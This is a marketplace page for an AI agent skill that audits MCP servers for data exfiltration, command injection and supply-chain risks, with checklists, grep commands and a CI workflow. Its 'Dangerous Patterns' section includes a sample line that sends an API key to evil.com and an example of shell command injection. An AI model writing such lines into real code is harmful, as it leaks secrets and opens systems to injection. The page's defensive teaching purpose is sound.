← Back to Skills Marketplace
57
Downloads
0
Stars
0
Active Installs
1
Versions
Install in OpenClaw
/install mcp-security-audit
Description
Perform a security audit of MCP servers to detect data exfiltration, command injection, permission escalation, and supply chain vulnerabilities before use.
README (SKILL.md)
MCP Security Audit 🔒
Don't blindly trust MCP servers. Audit them first.
The Problem
MCP (Model Context Protocol) servers give AI agents powerful capabilities - file access, API calls, code execution. But they can also:
- Exfiltrate data to external servers
- Execute arbitrary commands on your machine
- Access files beyond intended scope
- Chain vulnerabilities for privilege escalation
Real incident: CVE-2026-23744 exposed MCP injection vulnerabilities. Supply chain attacks via compromised MCP packages are a growing threat.
Quick Audit Checklist
1. Source Verification ✅
□ Is this an official/verified package?
□ Check npm/PyPI download counts and maintainer history
□ Review recent commits for suspicious changes
□ Verify package signature if available
2. Network Audit 🌐
□ List all external URLs/domains the MCP connects to
□ Check for hardcoded API endpoints
□ Verify TLS certificate validation is enabled
□ Flag any data sent to unknown domains
3. File Access Audit 📁
□ What directories can the MCP read/write?
□ Is access scoped to project directory only?
□ Check for path traversal vulnerabilities
□ Flag any access to ~/.ssh, ~/.config, env files
4. Command Execution Audit ⚡
□ Does the MCP execute shell commands?
□ Are commands user-controlled or hardcoded?
□ Check for command injection vectors
□ Verify sandboxing/isolation if present
5. Permission Scope Audit 🔑
□ What permissions does the MCP request?
□ Are permissions minimal (principle of least privilege)?
□ Check for excessive scope requests
□ Verify user consent for sensitive operations
6. Dependency Audit 📦
□ Run npm audit / pip-audit / cargo audit
□ Check for known CVEs in dependencies
□ Flag outdated packages with security fixes
□ Review transitive dependencies
Audit Commands
For npm-based MCP servers:
# Check package.json for suspicious scripts
cat package.json | jq '.scripts'
# Audit dependencies
npm audit
# Check for post-install scripts
cat package.json | jq '.scripts.postinstall, .scripts.preinstall'
# List network calls (requires grep)
grep -r "fetch\|axios\|http\|https\|ws://" src/ --include="*.js" --include="*.ts"
For Python MCP servers:
# Check requirements.txt for suspicious packages
cat requirements.txt
# Audit dependencies
pip-audit
# Check for network calls
grep -r "requests\|urllib\|httpx\|aiohttp" src/ --include="*.py"
# Check for subprocess calls
grep -r "subprocess\|os.system\|exec\|eval" src/ --include="*.py"
Risk Scoring
| Category | Weight | High Risk Indicators |
|---|---|---|
| Network | 30% | Unknown domains, no TLS, data exfil patterns |
| File Access | 25% | Home dir access, path traversal, sensitive files |
| Command Exec | 25% | Unsanitized input, shell=True, arbitrary commands |
| Dependencies | 15% | Known CVEs, unmaintained packages |
| Source | 5% | Unverified maintainer, recent ownership change |
Score ≥ 70: High risk - Do not use without review Score 40-69: Medium risk - Use with caution Score \x3C 40: Low risk - Generally safe
Red Flags 🚩
Immediately reject MCP servers with:
- Obfuscated code -
eval(atob('...'))or similar - Dynamic code loading - Loading code from remote URLs
- Environment variable exfil - Sending
process.envoros.environexternally - Credential harvesting - Asking for passwords/tokens unnecessarily
- No source code - Binary-only distributions without reproducible builds
Audit Report Template
# MCP Security Audit Report
**Server**: [name]
**Version**: [version]
**Audited**: [date]
**Risk Score**: [score]/100
## Findings
### Critical
- [list critical issues]
### High
- [list high issues]
### Medium
- [list medium issues]
### Low
- [list low issues]
## Recommendations
1. [recommendation]
2. [recommendation]
## Verdict
[ ] APPROVED - Safe to use
[ ] APPROVED WITH CAUTION - Review recommendations
[ ] REJECTED - Too many risks
Common MCP Security Patterns
Safe Patterns ✅
// Scoped file access
const allowedDir = path.resolve(process.cwd(), 'data');
if (!filePath.startsWith(allowedDir)) throw new Error('Access denied');
// Sanitized commands
const allowedCommands = ['git', 'npm', 'node'];
if (!allowedCommands.includes(cmd)) throw new Error('Command not allowed');
// Explicit user consent
if (!await askUserConsent('Allow access to X?')) return;
Dangerous Patterns ❌
// DON'T: Unrestricted file read
fs.readFileSync(userInput); // Path traversal!
// DON'T: Shell injection
exec(`git ${userBranch}`); // Command injection!
// DON'T: Credential exposure
fetch('https://evil.com/steal?token=' + process.env.API_KEY);
Integration with CI/CD
Add to your workflow:
# .github/workflows/mcp-audit.yml
name: MCP Security Audit
on: [push, pull_request]
jobs:
audit:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Audit MCP servers
run: |
# Add your audit commands here
npm audit
# Check for suspicious patterns
grep -r "eval\|exec\|process.env" mcp-servers/ && exit 1
Related Skills
- prompt-guard - Protect against prompt injection
- skill-error-recovery - Handle MCP connection failures gracefully
- token-budget-guard - Monitor MCP token usage
References
Remember: Every MCP server you add expands your agent's attack surface. Audit before you trust.
Usage Guidance
This is a procedural audit checklist (no code). It's generally safe to use. Before running the recommended commands, ensure you have local copies of the MCP server code (don't run arbitrary install scripts from untrusted packages), run the audit in an isolated environment if possible, and make sure the host has the tools the guide references (jq, grep, npm, pip-audit). The checklist may produce false positives; use manual review for high-risk findings and verify package provenance and signatures before enabling an MCP server in production.
Capability Analysis
Type: OpenClaw Skill
Name: mcp-security-audit
Version: 1.1.0
The skill bundle is a defensive security tool designed to guide an AI agent in auditing Model Context Protocol (MCP) servers for vulnerabilities. Both SKILL.md and README.md provide legitimate security checklists, risk scoring frameworks, and standard audit commands (e.g., 'npm audit', 'grep' for sensitive patterns) aimed at detecting data exfiltration and command injection. There is no evidence of malicious intent, obfuscation, or harmful instructions; the content is entirely aligned with its stated purpose of improving security posture.
Capability Tags
Capability Assessment
Purpose & Capability
The name/description and the SKILL.md consistently describe an MCP security audit. The skill requests no credentials, binaries, or installs, which is proportionate for a procedural audit/checklist.
Instruction Scope
The SKILL.md tells the operator to run local inspection commands (grep, npm audit, pip-audit, review package.json, etc.) and to check for access to sensitive paths like ~/.ssh or process.env. Those actions are appropriate for an audit, but they assume access to source code and host tooling. The instructions do not instruct exfiltration or contacting any hidden endpoints.
Install Mechanism
No install spec or code files — instruction-only — so nothing will be written to disk by the skill itself. This is the lowest-risk install model.
Credentials
The skill declares no required environment variables or credentials. The SKILL.md sensibly recommends checking for credential leakage but does not ask for secrets from the user.
Persistence & Privilege
always is false and the skill is user-invocable; model invocation is allowed (the platform default). There is no request for permanent system presence or to modify other skills or global agent settings.
How to Use
- Make sure OpenClaw is installed (local or Docker)
- Run the install command in chat:
/install mcp-security-audit - After installation, invoke the skill by name or use
/mcp-security-audit - Provide required inputs per the skill's parameter spec and get structured output
Version History
v1.1.0
v1.1: Audit flow diagram, sample report, safe/unsafe code patterns
Metadata
Frequently Asked Questions
What is Skill Mcp Security Audit?
Perform a security audit of MCP servers to detect data exfiltration, command injection, permission escalation, and supply chain vulnerabilities before use. It is an AI Agent Skill for Claude Code / OpenClaw, with 57 downloads so far.
How do I install Skill Mcp Security Audit?
Run "/install mcp-security-audit" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.
Is Skill Mcp Security Audit free?
Yes, Skill Mcp Security Audit is completely free, licensed under MIT-0. You can download, install and use it at no cost.
Which platforms does Skill Mcp Security Audit support?
Skill Mcp Security Audit is cross-platform and runs anywhere OpenClaw / Claude Code is available (cross-platform).
Who created Skill Mcp Security Audit?
It is built and maintained by Erwin (@aptratcn); the current version is v1.1.0.
More Skills